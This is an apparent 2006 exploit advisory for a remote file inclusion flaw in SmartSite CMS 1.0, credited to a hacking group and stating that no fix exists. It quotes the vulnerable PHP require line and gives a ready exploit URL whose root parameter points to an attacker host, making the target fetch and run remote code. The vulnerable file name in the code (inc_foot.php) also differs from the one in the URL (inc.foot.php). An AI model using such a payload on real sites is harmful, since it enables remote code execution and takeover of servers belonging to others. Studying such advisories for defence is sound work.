SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

2006-06-20 00:00:00

# smartsite cms <= 1.0 Remote File Inclusion
#
# Contact : irc.gigachat.net #ir4dex
# Risk : High
# Class : Remote
# Script : smartsite cms
# Version : not specified
# URL: http://www.smartsitecms.net/
---------------------------------------------------------------------

Vulnerable code :

require($root . "include/inc_foot.php");

---------------------------------------------------------------------

http://www.site.com/[smartsitecmspath]/include/inc.foot.php?root=http://[attacker]

by Archit3ct and IR4DEX GROUP

Greetz: Darkfire

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.